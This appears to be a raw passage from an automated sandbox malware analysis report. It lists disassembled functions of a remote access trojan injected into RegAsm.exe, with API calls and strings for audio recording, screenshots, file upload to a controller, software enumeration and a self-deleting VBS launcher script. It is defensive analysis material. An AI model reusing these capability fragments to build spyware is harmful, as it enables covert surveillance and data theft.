                                                        • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
                                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                                        • SetEvent.KERNEL32 ref: 0041B219
                                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                                        • CloseHandle.KERNEL32 ref: 0041B23A
                                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                        • API String ID: 738084811-2094122233
                                                        • Opcode ID: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                                                        • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                                        • Opcode Fuzzy Hash: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                                                        • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                        • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                        • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                        • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Write$Create
                                                        • String ID: RIFF$WAVE$data$fmt
                                                        • API String ID: 1602526932-4212202414
                                                        • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                        • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                                        • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                        • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                        • API String ID: 1646373207-351152038
                                                        • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                        • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                                        • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                        • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 0040CE07
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                                        • CopyFileW.KERNEL32 ref: 0040CED0
                                                        • _wcslen.LIBCMT ref: 0040CEE6
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                                        • CopyFileW.KERNEL32 ref: 0040CF84
                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                                        • _wcslen.LIBCMT ref: 0040CFC6
                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                                        • CloseHandle.KERNEL32 ref: 0040D02D
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                                        • ExitProcess.KERNEL32 ref: 0040D062
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                        • String ID: 6$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$del$open
                                                        • API String ID: 1579085052-545640883
                                                        • Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                                        • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                                        • Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                                        • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(?), ref: 0041C036
                                                        • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                                        • lstrlenW.KERNEL32(?), ref: 0041C067
                                                        • FindFirstVolumeW.KERNEL32 ref: 0041C0A2
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                                        • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                                        • _wcslen.LIBCMT ref: 0041C13B
                                                        • FindVolumeClose.KERNEL32 ref: 0041C15B
                                                        • GetLastError.KERNEL32 ref: 0041C173
                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                                        • lstrcatW.KERNEL32 ref: 0041C1B9
                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                                        • GetLastError.KERNEL32 ref: 0041C1D0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                        • String ID: ?
                                                        • API String ID: 3941738427-1684325040
                                                        • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                        • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                                        • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                        • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,65B51986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                                        • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                                        • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                                        • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                                        • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                                        • Sleep.KERNEL32(00000064), ref: 00412E94
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                        • String ID: /stext "$0TG$0TG$NG$NG
                                                        • API String ID: 1223786279-2576077980
                                                        • Opcode ID: de99695a2377092233645f0904676b2253a7a5c985bfcff82bcc484c3e6878f2
                                                        • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                                        • Opcode Fuzzy Hash: de99695a2377092233645f0904676b2253a7a5c985bfcff82bcc484c3e6878f2
                                                        • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0044F42D Relevance: 24.4, APIs: 16, Instructions: 419COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$EnvironmentVariable
                                                        • String ID:
                                                        • API String ID: 1464849758-0
                                                        • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                        • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                                        • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                        • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                                        • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                                                        • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEnumOpen
                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                        • API String ID: 1332880857-3714951968
                                                        • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                        • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                                        • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                        • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                                        • GetCursorPos.USER32(?), ref: 0041D5E9
                                                        • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                                        • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                                        • ExitProcess.KERNEL32 ref: 0041D665
                                                        • CreatePopupMenu.USER32 ref: 0041D66B
                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                        • String ID: Close
                                                        • API String ID: 1657328048-3535843008
                                                        • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                        • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                                        • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                        • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$Info
                                                        • String ID:
                                                        • API String ID: 2509303402-0
                                                        • Opcode ID: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                                        • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                                        • Opcode Fuzzy Hash: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                                        • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
                                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                                        • __aulldiv.LIBCMT ref: 00408D4D
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                                        • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                        • CloseHandle.KERNEL32(00000000), ref: 00408FAE
                                                        • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                        • API String ID: 3086580692-2582957567
                                                        • Opcode ID: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                                                        • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                                        • Opcode Fuzzy Hash: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                                                        • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___free_lconv_mon.LIBCMT ref: 0045130A
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                                        • _free.LIBCMT ref: 004512FF
                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                        • _free.LIBCMT ref: 00451321
                                                        • _free.LIBCMT ref: 00451336
                                                        • _free.LIBCMT ref: 00451341
                                                        • _free.LIBCMT ref: 00451363
                                                        • _free.LIBCMT ref: 00451376
                                                        • _free.LIBCMT ref: 00451384
                                                        • _free.LIBCMT ref: 0045138F
                                                        • _free.LIBCMT ref: 004513C7
                                                        • _free.LIBCMT ref: 004513CE
                                                        • _free.LIBCMT ref: 004513EB
                                                        • _free.LIBCMT ref: 00451403
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 161543041-0
                                                        • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                        • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                                        • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                        • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00419FB9
                                                        • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                                        • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                                        • GetLocalTime.KERNEL32(?), ref: 0041A105
                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                        • API String ID: 489098229-1431523004
                                                        • Opcode ID: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                                        • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                                        • Opcode Fuzzy Hash: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                                        • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                          • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                          • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
                                                          • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                        • ExitProcess.KERNEL32 ref: 0040D9C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                        • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                        • API String ID: 1913171305-3159800282
                                                        • Opcode ID: 915a6608449d123814c07db32fe1ac6c9b684f59cbeaa3b418ee84a827032fa7
                                                        • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                                        • Opcode Fuzzy Hash: 915a6608449d123814c07db32fe1ac6c9b684f59cbeaa3b418ee84a827032fa7
                                                        • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                        • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                                        • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                        • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
